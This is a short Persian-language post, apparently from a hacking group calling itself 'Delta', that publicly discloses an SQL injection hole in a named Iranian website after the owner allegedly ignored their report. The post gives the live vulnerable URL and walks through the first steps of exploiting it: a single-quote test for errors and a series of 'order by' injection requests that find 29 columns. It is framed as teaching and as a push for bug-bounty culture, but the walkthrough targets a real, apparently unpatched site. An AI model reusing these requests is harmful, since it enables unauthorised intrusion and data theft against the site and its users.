SQLi Issues Discovered – Ignored #Iran

سلام به کاربران عزیز تیم امنیتی #دلتا

دیروز از یه سایت ایرانی باگ sqli گرفتیم و به مدیر این سایت هم هشدار دادیم اما متاسفانه خبری از #بانتی و جدی گرفتن این هشدار نبود

بر همین اساس نحوه نفوذ به این تارگت رو با شما Share میکنیم تا هم شما با این حمله آشنا بشید و هم فرهنگ بانتی در کشورمون رواج پیدا کنه
لینک آسیب پذیر :
http://superpipe.ir/plugins/spiproject/details.php?id=17952

خب در ابتدا میایم به آدرس بالا #تک_کوتیشن اضافه میکنیم

اگر ارور داد یا صفحه ناقص شد یعنی سایتمون آسیب پذیره
===================
با دستور order by میایم تعداد ستون هارو در میاریم

http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 1
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 10
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 20
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 30
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 29

خب متوجه میشیم که این سایت 29 ستون داره

آموزش در پارت های بعدی ادامه دارد – #پارت_اول

Categories: